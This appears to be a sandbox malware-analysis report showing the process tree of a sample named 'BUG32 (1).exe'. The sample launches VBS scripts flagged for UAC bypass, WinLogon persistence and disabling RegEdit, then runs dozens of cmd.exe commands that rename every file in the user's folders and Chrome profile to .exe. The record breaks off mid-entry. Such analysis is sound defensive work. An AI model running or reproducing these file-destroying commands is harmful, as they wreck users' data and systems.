  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
  2⤵
  PID:4236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
  2⤵
  PID:3748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4980 /prefetch:8
  2⤵
  PID:1476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
  2⤵
  PID:3400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6112 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3556
- C:\Users\Admin\Downloads\BUG32 (1).exe
  "C:\Users\Admin\Downloads\BUG32 (1).exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3512
- - C:\Windows\system32\wscript.exe
    "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\B3EA.tmp\B3EB.vbs
    3⤵
    - UAC bypass
    - System policy modification
    PID:4480
  - - C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" "C:\BUG32\admin.vbs"
      4⤵
      PID:1736
    - - C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" "C:\bug32\jaq.vbs" RunAsAdministrator
        5⤵
        Modifies WinLogon for persistence
        UAC bypass
        Disables RegEdit via registry modification
        Modifies system executable filetype association
        Drops desktop.ini file(s)
        Access Token Manipulation: Create Process with Token
        Modifies Control Panel
        Modifies registry class
        Suspicious behavior: GetForegroundWindowSpam
        System policy modification
        
        PID:4972
      - C:\Program Files (x86)\Windows Media Player\wmplayer.exe
        
        "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
        6⤵
        Drops desktop.ini file(s)
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:4836
        
        C:\Windows\SysWOW64\unregmp2.exe
        
        "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3856
        
        C:\Windows\system32\unregmp2.exe
        
        "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
        8⤵
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        
        PID:3880
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 2356
        7⤵
        Program crash
        
        PID:1528
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c dir "C:\Users\Admin\" /s/b/o:n/a:d > "C:\BUG32\list.lnk" & echo :ok:>>"C:\bug32\list.lnk"
        6⤵
        
        PID:3044
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\*.*" "*.exe"
        6⤵
        
        PID:4936
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Application Data\*.*" "*.exe"
        6⤵
        
        PID:4344
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Contacts\*.*" "*.exe"
        6⤵
        
        PID:4880
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Cookies\*.*" "*.exe"
        6⤵
        
        PID:5088
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Desktop\*.*" "*.exe"
        6⤵
        
        PID:2808
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Documents\*.*" "*.exe"
        6⤵
        
        PID:5032
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Downloads\*.*" "*.exe"
        6⤵
        
        PID:1076
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Favorites\*.*" "*.exe"
        6⤵
        
        PID:4860
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Links\*.*" "*.exe"
        6⤵
        
        PID:4912
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Local Settings\*.*" "*.exe"
        6⤵
        
        PID:1836
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Music\*.*" "*.exe"
        6⤵
        
        PID:4480
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\My Documents\*.*" "*.exe"
        6⤵
        
        PID:2028
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\NetHood\*.*" "*.exe"
        6⤵
        
        PID:2168
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\OneDrive\*.*" "*.exe"
        6⤵
        
        PID:3556
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Pictures\*.*" "*.exe"
        6⤵
        
        PID:3676
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\PrintHood\*.*" "*.exe"
        6⤵
        
        PID:2196
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Recent\*.*" "*.exe"
        6⤵
        
        PID:2288
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Saved Games\*.*" "*.exe"
        6⤵
        
        PID:4860
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Searches\*.*" "*.exe"
        6⤵
        
        PID:4936
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\SendTo\*.*" "*.exe"
        6⤵
        
        PID:4912
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Start Menu\*.*" "*.exe"
        6⤵
        
        PID:4632
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Templates\*.*" "*.exe"
        6⤵
        
        PID:1908
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Videos\*.*" "*.exe"
        6⤵
        
        PID:4572
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\*.*" "*.exe"
        6⤵
        
        PID:424
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\*.*" "*.exe"
        6⤵
        
        PID:2560
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\*.*" "*.exe"
        6⤵
        
        PID:3144
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\*.*" "*.exe"
        6⤵
        
        PID:2904
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Application Data\*.*" "*.exe"
        6⤵
        
        PID:2604
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\*.*" "*.exe"
        6⤵
        
        PID:3632
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\*.*" "*.exe"
        6⤵
        
        PID:2196
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\D3DSCache\*.*" "*.exe"
        6⤵
        
        PID:1488
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\*.*" "*.exe"
        6⤵
        
        PID:552
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\History\*.*" "*.exe"
        6⤵
        
        PID:2896
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\*.*" "*.exe"
        6⤵
        
        PID:4856
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\*.*" "*.exe"
        6⤵
        
        PID:4804
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\*.*" "*.exe"
        6⤵
        
        PID:2808
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\PeerDistRepub\*.*" "*.exe"
        6⤵
        
        PID:1580
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Publishers\*.*" "*.exe"
        6⤵
        
        PID:4964
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\*.*" "*.exe"
        6⤵
        
        PID:780
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temporary Internet Files\*.*" "*.exe"
        6⤵
        
        PID:3344
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\*.*" "*.exe"
        6⤵
        
        PID:1252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Color\*.*" "*.exe"
        6⤵
        
        PID:3476
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\*.*" "*.exe"
        6⤵
        
        PID:4792
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\Cache\*.*" "*.exe"
        6⤵
        
        PID:1124
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\ToolsSearchCacheRdr\*.*" "*.exe"
        6⤵
        
        PID:4936
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\*.*" "*.exe"
        6⤵
        
        PID:656
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\Unistore\*.*" "*.exe"
        6⤵
        
        PID:4804
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\UnistoreDB\*.*" "*.exe"
        6⤵
        
        PID:1616
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\Unistore\data\*.*" "*.exe"
        6⤵
        
        PID:752
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\Unistore\data\temp\*.*" "*.exe"
        6⤵
        
        PID:1196
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\*.*" "*.exe"
        6⤵
        
        PID:4560
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\D3DSCache\45a5e5b635b28e7a\*.*" "*.exe"
        6⤵
        
        PID:3296
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\*.*" "*.exe"
        6⤵
        
        PID:3676
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\*.*" "*.exe"
        6⤵
        
        PID:720
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\AutofillStates\*.*" "*.exe"
        6⤵
        
        PID:2624
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CertificateRevocation\*.*" "*.exe"
        6⤵
        
        PID:2956
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\*.*" "*.exe"
        6⤵
        
        PID:4368
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crowd Deny\*.*" "*.exe"
        6⤵
        
        PID:2680
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\*.*" "*.exe"
        6⤵
        
        PID:1092
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FileTypePolicies\*.*" "*.exe"
        6⤵
        
        PID:2128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded\*.*" "*.exe"
        6⤵
        
        PID:780
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\*.*" "*.exe"
        6⤵
        
        PID:1196
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\*.*" "*.exe"
        6⤵
        
        PID:1836
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\hyphen-data\*.*" "*.exe"
        6⤵
        
        PID:4168
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\*.*" "*.exe"
        6⤵
        
        PID:3652
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MEIPreload\*.*" "*.exe"
        6⤵
        
        PID:2916
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\*.*" "*.exe"
        6⤵
        
        PID:3740
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OptimizationHints\*.*" "*.exe"
        6⤵
        
        PID:1648
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OriginTrials\*.*" "*.exe"
        6⤵
        
        PID:4752
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\PKIMetadata\*.*" "*.exe"
        6⤵
        
        PID:2168
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\PrivacySandboxAttestationsPreloaded\*.*" "*.exe"
        6⤵
        
        PID:2560
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\RecoveryImproved\*.*" "*.exe"
        6⤵
        
        PID:2312
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SafetyTips\*.*" "*.exe"
        6⤵
        
        PID:2128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\segmentation_platform\*.*" "*.exe"
        6⤵
        
        PID:1448
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\*.*" "*.exe"
        6⤵
        
        PID:5084
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\*.*" "*.exe"
        6⤵
        
        PID:848
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\*.*" "*.exe"
        6⤵
        
        PID:4704
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\*.*" "*.exe"
        6⤵
        
        PID:1580
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\TpcdMetadata\*.*" "*.exe"
        6⤵
        
        PID:720
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\*.*" "*.exe"
        6⤵
        
        PID:552
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\WidevineCdm\*.*" "*.exe"
        6⤵
        
        PID:4860
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ZxcvbnData\*.*" "*.exe"
        6⤵
        
        PID:2624
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\*.*" "*.exe"
        6⤵
        
        PID:4364
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\*.*" "*.exe"
        6⤵
        
        PID:4752
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\*.*" "*.exe"
        6⤵
        
        PID:4660
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\*.*" "*.exe"
        6⤵
        
        PID:3452
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\*.*" "*.exe"
        6⤵
        
        PID:3980
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\*.*" "*.exe"
        6⤵
        
        PID:4632
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\*.*" "*.exe"
        6⤵
        
        PID:900
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\*.*" "*.exe"
        6⤵
        
        PID:4740
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\*.*" "*.exe"
        6⤵
        
        PID:1836
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db\*.*" "*.exe"
        6⤵
        
        PID:2804
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\databases\*.*" "*.exe"
        6⤵
        
        PID:2916
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\*.*" "*.exe"
        6⤵
        
        PID:2364
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\discounts_db\*.*" "*.exe"
        6⤵
        
        PID:3596
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\*.*" "*.exe"
        6⤵
        
        PID:2088
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\*.*" "*.exe"
        6⤵
        
        PID:4364
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\*.*" "*.exe"
        6⤵
        
        PID:2292
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\*.*" "*.exe"
        6⤵
        
        PID:3996
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\*.*" "*.exe"
        6⤵
        
        PID:3980
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\*.*" "*.exe"
        6⤵
        
        PID:3340
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\*.*" "*.exe"
        6⤵
        
        PID:2864
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\*.*" "*.exe"
        6⤵
        
        PID:4912
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*.*" "*.exe"
        6⤵
        
        PID:1768
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\*.*" "*.exe"
        6⤵
        
        PID:3512
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\*.*" "*.exe"
        6⤵
        
        PID:2916
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\*.*" "*.exe"
        6⤵
        
        PID:3336
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\*.*" "*.exe"
        6⤵
        
        PID:2560
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\*.*" "*.exe"
        6⤵
        
        PID:4800
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\*.*" "*.exe"
        6⤵
        
        PID:2292
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\*.*" "*.exe"
        6⤵
        
        PID:4580
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\*.*" "*.exe"
        6⤵
        
        PID:1300
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\*.*" "*.exe"
        6⤵
        
        PID:1980
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\*.*" "*.exe"
        6⤵
        
        PID:3728
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\*.*" "*.exe"
        6⤵
        
        PID:3676
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\*.*" "*.exe"
        6⤵
        
        PID:5020
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\*.*" "*.exe"
        6⤵
        
        PID:1696
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\*.*" "*.exe"
        6⤵
        
        PID:1652
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\*.*" "*.exe"
        6⤵
        
        PID:3596
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\*.*" "*.exe"
        6⤵
        
        PID:2228
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\WebStorage\*.*" "*.exe"
        6⤵
        
        PID:3144
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\b6050a61-f7a4-4422-9d97-ddf1f4a799e0\*.*" "*.exe"
        6⤵
        
        PID:1668
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\*.*" "*.exe"
        6⤵
        
        PID:4800
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\*.*" "*.exe"
        6⤵
        
        PID:3764
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\*.*" "*.exe"
        6⤵
        
        PID:3832
      - C:\Windows\System32\cmd.exe
        
